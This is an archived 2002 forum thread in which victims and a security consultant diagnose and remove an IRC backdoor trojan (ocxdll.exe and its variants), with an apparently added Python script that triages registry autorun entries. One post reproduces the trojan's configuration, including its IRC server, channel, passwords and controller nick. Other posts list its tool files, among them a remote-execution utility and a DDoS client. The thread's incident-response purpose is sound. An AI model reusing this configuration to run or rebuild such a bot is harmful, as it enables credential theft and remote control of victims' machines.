Great info, just got a DOS window up on my girlfriend's computer with MT.EXE, searched Google and this is what I found, great thread! I was able to quickly identify this trojan and find the quite disturbing file with our IPs that had bank account numbers, logins for our internet games, and even my brand of cigarettes! Thanks for the tips all
djhouston

10/26/02
I have the "HideWindow - Error, Window Not Found!" currently showing on my system. In summary what should I do to clear this off. It is hanging the computer.

Dj

Vadim
vkoshkin@rogers.com
10/26/02
Great help. Thanks to all. Just had been alerted by my ISP regarding multiple scans / attacks originating from my IP during the time I was hundreds of miles from my PC (though it was on). Following ISP recommendations I installed the MS security patch for W2000 and Trojan detecting software from www.moosoft.com. But while rebooting the machine I caught something like a mIRC logging window with references to rpc.bsd. IP installationtorebooting PC Following ISP recommendation psXXX.XXX.XXX.XXX.txt
Vadim
vkoshkin@rogems.com
10/26/02
Just submitted by mistake the incomplete message above. In my case I found nt32.ini, dll16.ini, etc., exactly as listed in aladin's e-mail above. But I did not find anything like abc.. or adob..
I also found psXXX...(my IP) with list of accounts and passwords. Very disturbing...
Charles
charles@charlesj5.net
10/28/02
I also have been infected with this trojan and I'm running Swat-IT as we speak .. but I would just like to say thanks to everyone that has posted on here about this.. I have recently uninstalled Quicktime and then I got a notice from NAV that I have this virus.. It seems to only affect Java applets on the internet with the Window Not Found error.. such as Runescape.com (a game). Well thanks again and we will see what Swat-It solves when it's done (6%).
Charles
charles@charlesj5.net
10/28/02
Well it took about 2 hours to scan (big hard drive) but it found exactly what I wanted .. and more.. (3)
--
1.) GT Bot M HideWindow - C:\WINNT\system32\MDM.EXE

2.) Network Crack Wizard 99 - C:\WINNT\system32\NCP.EXE

3.) GT Bot M HideWindow - C:\WINNT\system32\WINHP32.EXE

--

ALL WERE (CLEANED) and NOW EVERYTHING WORKS GREAT. Much thanks to all of y'all

David
slimer@slimer.co.uk
10/29/02
I too would like to thank people for posting here, it has been invaluable. Thanks especially to Kyle.

I sourced my trojan to some games I downloaded from Kazaa for the kids, it was either a counting game or a compilation of five arcade games that were zipped up. I thought I took necessary precautions by checking them with my AV, but they did not show up at that time.

I also had the file ps**.***.***.txt

All it seemed to contact were my pop3 addresses
and email password (since changed). The odd thing was that one of the pop3 addresses was spelt wrong, exactly as I had spelt it wrong when I first typed them in, rather than when the trojan installed. (Odd..) I assume from this that the file was not pulling information directly from Outlook but from an older file with my previous mistake.

I didn't get a Mirc logo or a hide window error, do I assume from the posts above that there are variants of the same trojan? If so, do all of the instructions that Kyle gave still apply?

Thank you AVG, Zonealarm and of course Kyle Lai.

David
slimer@slimer.co.uk
10/29/02
Also..

The dll16.ini file contained this..

n0=%server rpc.bsd.st
n1=%timeout 10
n2=%gnick.tmp kitskool
n3=%chan ###orlbe6###
n4=%pstor ps.txt
n5=%pass  broken !
n6=%pass8 hey there?
n7=%master ionix@ionix.users.undernet.org

the ps.txt file mentioned was empty.

David
slimer@slimer.co.uk
10/29/02
Further to above...

These files were to be deleted as per Kyles instructions :

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

My system does not contain:
gg.bat
httpsearch.ini or httpsear.ini
mdm.exe
mt.exe
ncp.exe
v.exe

I can only assume I have a variant. Was mine a cut down version or are these files there with alternate names? I have a copy of the ocxdll.exe if anyone wants to have it to check it. (I am not opening it!! :-) )

Kyle Lai
aladin168@hotmail.com
10/29/02
I haven't checked this site for a while and I am surprised that a lot more people were affected by this trojan... Seems like ocxdll.exe has made another round of attacks...

David,
If you have ocxdll.exe, please zip it up and send it to me at kyle@kylelai.com and maybe I can tell you if the attackers modified the filenames.

Can you guys tell me when you got affected by this virus? I heard there was a series of attacks around 10/23... Can you guys confirm this?

Good Luck,
/Kyle

Kyle Lai Consulting
www.kylelai.com
aladin168@hotmail.com
kyle@kylelai.com

Kyle Lai
aladin168@hotmail.com
10/29/02
Can you guys fill out this quick survey to share the information. It would be helpful for incident response people like me to analyze the situation better.

Survey:
--
1. What's your infected Operating System?
2. What Service Packs were installed (if any)?
3. What's the time of the infection (approximate)?
4. What actions have you taken?
5. Did you reset the password for your administrator accounts?
6. Did you ever see ocxdll.exe as an infected file?
7. Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
8. Did you ever see mt.exe? A possible dDos client.
9. What Anti-virus software do you use, and did it identify irc/flood trojans?
10. Did you see the virus coming back and alarmed by your Anti-virus program?
--

Thank you very much for your help!

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com

David
slimer@slimer.co.uk
10/29/02
1. What's your infected Operating System?
Win2k 5.00.2195
2. What Service Packs were installed (if any)?
Service Pack 2
3. What's the time of the infection (approximate)?
23rd October 2002
4. What actions have you taken?
Deleted files mentioned above.
5. Did you reset the password for your administrator accounts?
Yup
6. Did you ever see ocxdll.exe as an infected file?
Yup
7. Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
I did have it; my previous post saying it wasn't there was incorrect.
8. Did you ever see mt.exe? A possible dDos client.
No, did not see this one.
9. What Anti-virus software do you use, and did it identify irc/flood trojans?
Grisoft AVG (I am a cheapskate) It recognised C:\WINNT\SYSTEM32\OCXDLL.EXE:\winhp32.exe Trojan horse IRC/BackDoor.Flood Anti-Trojan 5.5 recognised and cleaned ncp.exe
10. Did you see the virus coming back and alarmed by your Anti-virus program?
Virus did not return after deletion.

Cheers

David.

Barbara Smith
barbara@rgpdental.com
11/01/02
I must add my thanks to all. I had just this week discovered the IRC Trojan and had the same problem as Pam with the hide window error (in addition to several other issues). Symantec AV CE did not find the source but Swat It did. Nice going for a free utility.
Mike
mikepehlivan@rogers.com
11/03/02
I found all of the abovementioned files except mt.exe and ncp.exe in a folder in program files\accessories\expl32

They were easily removed, but my folder was not deletable because of a sharing violation, and the registry entry was removed as well.

I'm about to reboot my computer and hope that nothing will be messed up.

The only reason I even began looking into all of this was because random ads started appearing on my screen for diplomas and crap -- the kind of stuff you find in spam e-mails. It was an unidentifiable program in a window, and once you closed it, it just went away. Then I found this winmngr.exe file in my task manager and thought it was it. When I searched online, I found this thread.

I'm just telling you my train of events, maybe others have experienced a similar train? Maybe the ads are related to this worm?

E-mail me with the subject line "TASKMNGR" at mikepehlivan@rogers.com if you have any information for me or if I can provide any for you.

Thanks,

Mike

Archie

11/04/02
Hi, I got this nasty thing too. Unfortunately, I don't know that much about computers, so thanks for everyone's help. I'm running Windows 2000 Professional at home on a personal desktop (no network set up). I think I got infected around 10/23-10/25. Swat It found ncp.exe (Network Crack Wizard 99) and wnhp32.exe (GT Bot Frozen Bot hide), and NAV finally started kicking too for other files. After I followed the registry instructions, things started clearing up. I also installed zone alarm just prior to deleting the infections and found that taskmngr.exe was trying to access the internet (IRC) every time I booted up. Does anyone know if this item, found in my registry has virus potential? RUNDLL32.EXE NvQTwk,NvCplDaemon initialize Thanks, Archie
Scott

11/05/02
So how is it for sure that I can rid my home network of this virus in other words what is it that I need to do in order to get rid of "mIRC" off of my computer? Please help me I am so tired of this. Also once I have it gone what else do I need to do in order to secure my home network and is it true that I am going to need to change all of my passwords?
Lane
DPS_Lane@hotmaail.com
11/06/02
A Trojan Worm..
Well it looks like they've morphed it! My customer who'd been hit last month by the taskmngr.exe got hit again but this time it was called winclock.exe. I'm not the IT contractor correcting this so I don't have any other info. But beware.
john

11/06/02
I've had this virus twice already, and every time the only way I thought I could get rid of it was to reinstall Win 2k Pro, which I did. Now, thanks to everyone here, I'm running Swat It as well as Sygate Firewall Pro, and hopefully it won't return. I've got a small question though: do I still have to put a password for administrator at startup, or can I leave it blank if I'm running a firewall?
Thanx
David
slimer@slimer.co.uk
11/07/02
Word of friendly warning, the Anti-Trojan 5.5 programme mentioned above found a trojan on my computer, but missed 5 others. Norton are doing a 15 free trial on its 2003 AV, it seemed to spot the others.
Kyle Lai
aladin168@hotmail.com
11/07/02
For Archie, Scott, John and others:

If you were hit by this virus/Trojan, and variants of the original virus/Trojan, YOU BETTER CHANGE YOUR PASSWORDS, and make sure it is something harder to guess. DEFINITELY NOT BLANK!

I heard the new variants might get your user ID and passwords and credit card info if they are on the computer, so beware!

This thread is getting long, and if you missed the link to my original analysis, they are at:
Part1:
http://groups.google.com/groups?hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com

Part2:
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

They might not apply to the latest variants, but from what I have seen so far, the malicious files are listed below:

ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
--
New Files:
--
BACKUP.BAT
NT32.INI
PSTOR.EXE
WINHP32.EXE
DDSHARE.EXE

If you are attacked more than once, that means your system is still vulnerable.

I can't stress enough... Make sure you:
1. Get the 4 FREE anti-virus, firewall, anti-trojan software from my posting on 09/24/02 above.
2. Install and Run your Anti-Virus and clean the viruses. Schedule it to run every day.
3. Install and Run SWAT-IT and clean the Trojans. Run it once a week.
4. Install Personal Firewall (zonealarm) or a hardware firewall with Router for DSL or Broadband.
5. Change your ADMINISTRATOR password
6. Change all passwords for your user accounts. The attacker might have gotten a copy of UserIds and Passwords already.

Good Luck!
/Kyle

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com

Kayne

11/10/02
Grr. This is one annoying virus. Today I decided to disable Zonealarm for about 5 minutes while I did some benchmarking. Big mistake. I never thought a virus could actually be uploaded when there were no active programs running with a connection to the internet. I suppose I was taught a lesson today. What alerted me to the newly uploaded program was when 3dMark quit out on me halfway through the benchmark because adobea.exe took away window focus. I then did a search for files created, and adobea.exe appeared with a few others. The funny thing is, I did a search for new files created about 10 minutes before I started the benchmark because I was looking for files left over from a previous installation of Asheron's Call 2. The adobea.exe file was not in there. I would have noticed it. So I'm guessing that basically what happened was when I disabled ZoneAlarm someone connected to my ip and proceeded to upload the files. Didn't know it was even possible, but apparently it is.
Sara
Mod_grrl@yahoo.com
11/10/02
I've followed all the instructions above but am not as familiar with the command prompt as I suppose I should be and am having trouble restoring my security settings back to default. I am running Windows 2000 Pro and have scanned the files and wiped everything out and changed all my passwords; if someone could email me and give me a slight nudge in the correct direction, I would really, really appreciate it.

s

Kayne

11/11/02
I ended up just formatting and reinstalling everything from scratch after cleaning up the virus. I just didn't trust my system being totally clean after seeing how much stuff this thing changes.
Akul

11/11/02
rhino,
Hello,

I found that Rhino (some FTP program) was being installed on its own on my computer. Previously, in the last week, Norton Antivirus did detect an IRC trojan; "c:\winnt\fonts\*.INS" were the infected (and quarantined) files. Recently I did install the Quicktime application. I wonder if there is any connection, as observed by a few. I do have Windows 2000 Pro and administrator with no password. I wonder if I am further at any risk.

Is Zonealarm a good firewall. I am serious about installing it!

-Akul

Kyle Lai
aladin168@hotmail.com
11/12/02
Zonealarm is a good firewall for home users. It's fairly easy to install and use. It keeps out most of the malicious incoming traffic.

If you don't have a personal firewall, you probably should consider installing it. You can learn more from their website, www.zonealarm.com

/Kyle

Randy

11/13/02
The taskmngr.exe has been renamed in the newer virus.
Its now task32.exe.

Here's a list of the files I found.
dll16.ini
dll32nt.hlp
nt32.ini
ocxdll.exe
task32.exe
xvpll.hlp

The registry entry above refers to task32.exe now instead of taskmngr.exe.

Thanks for the info.

Kyle Lai
aladin168@hotmail.com
11/14/02
Randy,
If you still have the ocxdll.exe file, please send it to me at kyle@kylelai.com. I'd like to see what new stuff they have added to this trojan.

Can you please let us know when you first noticed the infection? and what system was infected?

Thanks,
/Kyle
Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com

Mickael Hall
mjahall@hotmail.com
11/17/02
Hi,

Norton Anti-virus found this on my m/c yesterday. It did not identify all the files from Kyle's message of 11/07 but it at least alerted me to the problem. I followed Kyle's (Thanks) instructions for removing and have removed all the files mentioned above and restored user rights assignment for the Network. I no longer get the secedit cmd window on bootup. When I scan again for viruses, NAV finds none, however realtime protection finds the following:-

A0095786.BAT IRC Trojan C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP297\ Infected

and:-

_REGISTRY_USER_.DEFAULT IRC.Mimic C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP298\snapshot\ Infected

When I try to access the c:\system volume information directory, I get access denied even though I am logged in as an administrator.

Anyone else seen this? Any ideas how to proceed?

Thanks,

Mickael

ykje
otto72@hotmail.com
11/17/02
IRC/Flood virus
I have "IRC/Flood.k.dr.c" and "IRC/Flood.am" on my computer and I can't figure out which HKEY to delete. Does anyone have a suggestion?
ant

11/19/02
I have the same virus/trojan issue. Cleaned all the files, removed everything I could but kept getting mIRC at startup. BUT I didn't have taskmngr.exe on my drive anywhere. So when I tried to delete it from the registry, it wasn't there. SO I found out the run32dll in my registry activates a file called winnt/system32/task32.exe. This is as of 11-19-02 so maybe a new strain of the virus/trojan??? Keep aware
Kyle Lai
aladin168@hotmail.com
11/20/02
Ant,Ykje, Mike
Did you see ocxdll.exe detected as a mirc trojan by your antivirus software, and was it TASK32.EXE you detected? Also, when did you first detect the virus?

If you or anyone still have a copy of the trojan that spawned task32.exe, please send it to kyle@kylelai.com. I'd like to keep track of the variants of this virus. It seems to spread pretty fast. I know 3 variants so far. The hackers definitely know that people are not patched, either don't know, or don't have time, or don't want to...

To remove Trojan from the registry, you need to check registry entries at the following locations: (for complete info on where Trojan might reside in your computer, check out http://www.kylelai.com/trojan_paper.htm)

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com
www.kylelai.com
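Checking those six keys by hand in regedit is error-prone, and the thread shows the value name staying the same (run32dll) while the filename it launches changes between variants (taskmngr.exe, task32.exe, winclock.exe). The script below is an added example, not code from Kyle or any other poster: it reads a regedit export (regedit /e of the keys, or of the whole hive) and classifies every value under the six autorun keys listed above. A value whose program name is on the list of filenames reported in this thread is flagged known_bad; everything else is marked review rather than clean, because the list only covers what posters have seen so far. The embedded .reg text is constructed for the example (the run32dll entry posters describe, the NvCplDaemon and MSMSGS entries posters asked about, and a hypothetical task32.exe entry placed under RunOnce to show that every listed key is scanned); it is not an export from any real machine.

```python
"""Triage the autorun keys in a regedit export (regedit /e) against the
filenames this thread attributes to the trojan and its variants."""
import re
from typing import Dict, List

# The six autorun locations Kyle lists above (lower-cased for comparison).
AUTORUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runonce",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runservices",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runservicesonce",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\runonce",
}

# Executable names reported in this thread (Kyle's 11/07 list plus the renamed
# variants other posters saw). Anything not listed is "review", never "clean".
KNOWN_BAD = {
    "ocxdll.exe", "kill.exe", "mdm.exe", "mdm.scr", "mt.exe", "ncp.exe",
    "psexec.exe", "taskmngr.exe", "v.exe", "pstor.exe", "winhp32.exe",
    "ddshare.exe", "task32.exe", "winclock.exe", "adobea.exe", "adobes.exe",
    "servudaemon.exe",
}

# Constructed sample export (not from a real machine): the run32dll entry
# posters describe, two entries posters believed benign, and a hypothetical
# task32.exe entry under RunOnce so that more than one key is exercised.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"run32dll"="C:\\WINNT\\system32\\taskmngr.exe"
"NvCplDaemon"="RUNDLL32.EXE NvQTwk,NvCplDaemon initialize"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"run32dll"="C:\\WINNT\\system32\\task32.exe"
'''

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')   # "name"=data or @=data
STRING_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"$')             # REG_SZ data only


def reg_unescape(s: str) -> str:
    """Undo regedit string escaping (doubled backslashes and backslash-quote)."""
    return re.sub(r'\\(["\\])', r"\1", s)


def program_from_command(cmd: str) -> str:
    """Lower-cased basename of the executable a Run value launches.
    Handles both  "C:\\dir with spaces\\x.exe" /arg  and  C:\\dir\\x.exe arg."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        exe = cmd[1:end] if end > 0 else cmd[1:]
    else:
        exe = cmd.split()[0] if cmd else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_reg_export(text: str) -> List[Dict[str, str]]:
    """Walk a .reg export and classify each REG_SZ value under an autorun key."""
    findings: List[Dict[str, str]] = []
    current_key = ""
    for raw in text.splitlines():
        line = raw.strip()
        sec = SECTION_RE.match(line)
        if sec:
            current_key = sec.group(1)
            continue
        if current_key.lower() not in AUTORUN_KEYS:
            continue
        val = VALUE_RE.match(line)
        if not val:
            continue
        name = reg_unescape(val.group(1)) if val.group(1) is not None else "(Default)"
        data = STRING_RE.match(val.group(2))
        if not data:          # dword:/hex: data cannot be a command line
            continue
        program = program_from_command(reg_unescape(data.group(1)))
        verdict = "known_bad" if program in KNOWN_BAD else "review"
        findings.append({"key": current_key, "name": name,
                         "program": program, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in triage_reg_export(SAMPLE_REG):
        print(f"{f['verdict']:9} {f['name']:<12} {f['program']:<14} [{f['key']}]")
```

Note that a RUNDLL32.EXE entry is reported as rundll32.exe, so the DLL it actually loads (NvQTwk in the sample) still has to be looked at by hand; that is why the script never says "clean". To use it on a real box, export the keys with regedit, copy the .reg file to a machine with Python, and point triage_reg_export at its contents.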

Mickael Hall
mjahall@hotmail.com
11/20/02
OK, I've had the chance to monitor it a bit longer now. In answer to Kyle:-

The ocxdll.exe was detected as blank by NAV. The other files backup.bat, dll32.hlp, xvpll.hlp were detected as IRC Trojan and default, _registry_user_.default A0095786.bat, A0095787.hlp and A0095789.hlp were detected as IRC MIMIC. Other files on your list such as taskmngr.exe which were on my machine (and since removed) were never detected by NAV. I can send you the NAV log file if you like.

NAV was not installed correctly before I started to notice the secedit command window. I noticed it happening on October 28th. The only thing I had downloaded on that day was a VPN client attached to an email sent to me from work. I am assuming that was clean as it would have been scanned by work and I have not heard of anyone else there with the same problem. I had done a Windows update 2 days before and it is possible I just did not notice it then. Anyway, it was after a few days that I took the time to get NAV working properly and it found it (after a live update) on the first manual scan.

I no longer get the secedit cmd window and NAV does not detect any virus on a manual scan, it only detects it in the c:\system volume information directory on a realtime scan. I can't access that folder (it is hidden by default, but I changed that), I get Access denied although I am logged in as an Admin.

The last infected file NAV found was today:-

20/11/2002 15:40 _REGISTRY_USER_.DEFAULT IRC.Mimic File Quarantined DOODLES mhall C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP301\snapshot\ Infected Quarantine Clean virus from file Quarantine infected file Realtime scan

It is now finding one of these per day, exactly the same but with RPxxx being incremented by one each time. I am deleting them everytime NAV finds one. I believe these are backup files used to restore Windows XP. When I search the registry for the same GUID, it finds it in 4 places:-

HKEY_LOCAL_MACHINE\System\Controlset003\Control\BackupRestore\FilesNotToBackup\System Restore. The value is \System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\* /s

HKEY_LOCAL_MACHINE\System\Controlset003\Services\sr\parameters\MachineGUID with the value {09EB170D-7904-4451-AD52-778A1BB0050C}

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\BackupRestore\FilesNotToBackup\System Restore, with the value \System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\* /s

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\sr\parameters\MachineGUID, with the value {09EB170D-7904-4451-AD52-778A1BB0050C}

As far as cleaning the registry as per your post, I only found taskmngr.exe in [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] and deleted it. There is another key in there called SSCFBTN.exe - it may not have anything to do with anything but I have no idea what it is, the rest of the entries seem OK.

In [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] I have MSMSGS with the value "C:\Program Files\Messenger\msmsgs.exe" /background which I am assuming is just MSN Messenger, but then again, I would have assumed taskmngr.exe was just the task manager.

Sorry for the detail and some of it is probably irrelevant. If it helps or if you have any more information on how I might get rid of the virus in the c:\system volume information issue, let me know.

Thks,
Mickael

Ryan Wahlquist

11/21/02
Mickael- I am finding the same problem getting rid of this virus. I have deleted every known file associated with it and still about 4 times a day am coming up with a message saying C:\system volume information\.. file is infected with trojan.irc bounce. I cannot access the folder and have only just come up with the idea of disabling the system restore feature on XP and trying to restart in safe mode and delete that file folder. Theoretically XP will fix any system files deleted during this process and if not I can always restart using the XP disk and fix the install from there. I will let you know if it works. If of course anyone has a better idea please let me know by posting.

Ryan

Ryan Wahlquist

11/21/02
OK Michael- Here is what I have found. That damn folder is associated directly with the system restore points created in XP. All of the infected files you are coming up with are points that were created while your computer was infected. I personally believe that as long as Norton is coming up with that message it will continue to create "infected" restores. I am going to turn off the system restore and attempt to clean the restore points out of there. As to how to access the folder see the following article--http://www.jsiinc.com/SUBI/tip4400/rh4453.htm

That's about all I got for now.

Ryan

Kyle Lai
aladin168@hotmail.com
11/21/02
Michael/Ryan,

When did you get infected?
What is your operating system?
What service pack level are you at before and after you are infected?
What have you done after you were infected?
How did you attempt to remove every virus files, either successful or not?

If you have the original ocxdll.exe, or the original infected files, please rename it as ocxdll.exe.txt, zip it up and send it to me. I'm interested in seeing what has changed from the first variant. Please send it to kyle@kylelai.com

Thanks,
/Kyle

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com
www.kylelai.com

Kyle Lai
aladin168@hotmail.com
11/21/02
Just a side bar,
Astalavista.com has recompiled 2 parts of my original ocxdll.exe/taskmngr.exe trojan analysis into an easy to read format on 11/13/2002.

http://www.astalavista.com/trojans/library/trojans/analysis/mirc_trojan_analysis.shtml

It includes the summary from my webpage (www.kylelai.com/mIRC_Virus_Analysis.htm) as well. This analysis was done back in late August and early September on the original version of the trojan.

Several new variants have been reported in this discussion group, and I am trying to keep my webpage up to date.

/Kyle
Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com
www.kylelai.com

Mickael Hall
mjahall@hotmail.com
11/22/02
Ryan, Thanks for the info, I managed to get into the folder and will also try to clear them out.

Kyle,

I ran NAV on the directory now that I got rights and it found a0095788.exe which was a compressed file containing backup.bat, dll32.hlp and xvpll.hlp. The a00 name is just an XP backup naming convention, I'm 90% certain it is the original ocxdll.exe. I have renamed it a0095788.exe.txt and sent it to you.

What seems strange is that it also found infected _registry_user_.default files in backup folders previous to this one. The exe above was found in RP297, but the infected _registry_user_.default was found back in every folder since RP285. Also strange is that NAV never found these before. Maybe it was the access rights issue.

As Ryan says, XP is creating an infected backup of _registry_user_.default every day which I think is the HKEY_USERS/.default folder in the registry. I had a look in there and found HKEY_USERS/.default/software/Mirc/dateUsed with a value of 1035660900. It could be innocent. I no longer have Mirc installed on my machine.

In any case, after clearing the infected files from the backup folders, I am going to restore back to a point before 26/10 which is when I think this started. I'll let you know how I get on.

Mickael

David

11/22/02
HELP!!

My computer is infected with a virus that I cannot delete or clean. Whenever I try to access any website, I get the message "Hide Window Error" window not found.

Is there anyone out there that can explain in layman terms what I need to do in order to get rid of this virus?

Thank you

Kyle Lai
aladin168@hotmail.com
11/22/02
David,
Seems like you are infected with a virus.
The simplest way is to run Anti-Virus and Anti-Trojan software. As I mentioned in my earlier posting, you must run Antivirus, Anti-trojan, and install a firewall. There are 4 FREE software I listed on 9/24/2002 which will give you a good start.

In terms of your problem, there might be a virus calling the hidewindow program (part of the virus) trying to hide the window of a program. However, the name of the window was either misspelled when it called hidewindow, or the program the virus tried to hide has been terminated. Since hidewindow program could not find the right window to hide, it generated an error message, and that was what you saw.

The Hidewindow program is usually used to hide the GUI of programs specified in its configuration (parameters). Once a program is successfully hidden by hidewindow, you will not see the GUI, but you can see its process in the task manager. For example, if the hidewindow program is specified to hide your Windows Explorer, and if it's successful when you start Explorer, there might be a flash of Explorer, then you will not find Explorer anywhere. You can only see its process in the process list in the task manager.

Hope this helps.
/Kyle
Kyle Lai, CISSP, CISA
www.kylelai.com
kyle@kylelai.com

hookmeister

11/24/02
servudaemon.exe
and
task32.exe

get them out of the registry and delete.
thanks/Kyle -

Kyle Lai
aladin168@hotmail.com
11/25/02
Can someone send me the ocxdll.exe variant that had the file TASK32.EXE?

I am interested in analyzing different variants.

I am planning to write a part3 of my ocxdll.exe analysis series discussing about the variants.

Thanks,
/Kyle
Kyle Lai Consulting
www.kylelai.com
kyle@kylelai.com

Mickael Hall
mjahall@hotmail.com
11/26/02
Ryan,

Did you have any luck with the System Restore? I cleared out all the files (you can just switch off system restore to do that). NAV detects no virus on a manual scan, but as soon as I switch system restore back on, realtime protection finds it in _registry_user_.default that system restore creates.

Mickael

Lady_Gamecock

11/26/02
Stupid Trojan
Folks,

I want to thank each of you for providing such great information concerning this trojan. Without your help, I would have been stuck. Went and did all your suggestions and I feel confident that my computer should be ready to roll now.

Thanks again! Keep up the FANTASTIC job!
Lady_G

Jessica

11/27/02
Thank you the information you provided. I installed the anti-trojan software and got rid of several viruses that Norton Antivirus software could not detect. I am no longer receiving the "HideWindow - Error" message, my computer is running again at normal speed, and I feel as though my data is more secure.
JCN

12/02/02
FYI - For any of you with the virus who are unable to open critical webpages, I seem to be working with the 8/28 version of the virus, and I discerned that it only comes up on pages that contain java elements, such as Front-Page components or games or such, and only occurs in IE! If you open the same page under Netscape it works fine (for me). I do seem to have a lower level of infection however, as some of the files and issues described by others I do not seem to have...
Ryan Wahlquist

12/03/02
Mickael- I have figured out the problem. You were correct in saying that the files that continually come up as infected are system restore points. The easiest way to get rid of them is to go to system restore and turn it off. This will erase all system restore points on your computer. After you have shut it off restart your computer and run Anti-virus software again to make sure all files are gone. After this turn system restore back on and I would suggest setting a restore point to go back to.
As to your other question I had no luck getting rid of them through system restore as there were multiple restore points infected as the machine took a restore point of the computer while it had a corrupted restore point. It was a twisted cycle so I just nuked em all and started with a clean restore point. It has been working now on a clean system for a week with no recurrences. Any questions feel free to post.

To all other users- if you are on a home LAN, even behind a router, you might download and install Zone Alarm as if you ever open ports for gaming you will get hit with people trying to get onto your computer and as there have been multiple articles written XP and 2000pro are open to attacks in the security systems.

Ryan

Ryan

12/03/02
Sorry Mickael it was a case of not completely reading your post..duh. I cleaned the restore and ran the scan. It was gone after that. Did you restart your machine before turning system restore back on? It cleans the system and gets rid of current user info so that when the restore point is set there should be no traces of virus left. I would turn off computer then restart and run a complete scan, turn off again and only then set your restore back to on. It worked for me.
Another thing you might check is your user accounts and set a password for admin that only you would know. I would also disable the guest account so the only active account is administrator. This will help keep unwanted people out of your computer.

Ryan

ykje

12/06/02
Thanks for your help. I was looking at a black screen (not the screen of death fortunately) for 5 days and finally I found which key to delete. It was grim and I wish I had kept a record because I read that anyone interested in this virus needs to know what the critical keys are ... but the paperwork is lost on my desk. The good news is that backdoor virus is not fatal, it can be safe to be online. The bad news is that the future includes a new harddrive. A new network card ($10) is also a good idea since this is the core of the compromised IP address. Backdoor viruses are ugly, what can I say. The messages they leave are threatening, low class, base and uneducated. Become a hacker, fight back ... after all ... hackers are tunnel visioned.
ykje

12/06/02
Neglect all the advice about antivirus software ... clearly they don't realize that you have antivirus software that can't clean the virus. Go to start, run, type in 'regedit' and you are into the registry keys. This is where it becomes somewhat difficult because you have to know what your system needs in order to run and what doesn't belong. In addition you have to be confident enough in your decision to simply execute decisions about deletes. When you find a file name that looks unusual, research it on the web, don't believe everything you read and discriminately delete files. Hopefully, you will not have to do a complete re-install. Good luck ... and even girls can fix it so that means anyone can do it.
Chris

12/09/02
One of my users just got hit by a variant of this when she took her laptop home and connected it to her home cable modem (no Firewall of course).

She got tipped off when the local Anti-Virus program detected an infected file and fortunately disconnected and brought it to me.

The Anti-Virus Software (we use InoculateIT by CA) was next to useless for detecting this stuff. It picked up the one infected file (AdobeS.exe) which I think was part of the payload placed on the laptop but missed a lot of others that I know are also a problem.

Anyway this definitely seems to be a variant of the above Trojan... the main difference being some of the file names. The main file it has set to run automatically on startup in the registry is syscfg32.exe. They also downloaded a program called screwed.exe to the user's laptop. I haven't researched what it does yet.. but I'm sure it's not pleasant. Going to do a low level format, a complete system wipe and restore.

By the way whoever did this left files indicating the IRC channels & FTP servers they were using for this exploit, including their own passwords in plain text. Would be happy to e-mail copies of those along with anything else I thought would be helpful in researching the issue to anyone who was interested.

Good thing I stumbled on this thread via Google search. There is hardly any info available about this elsewhere... including the AV vendors sites

Kyle Lai
aladin168@hotmail.com
12/11/02
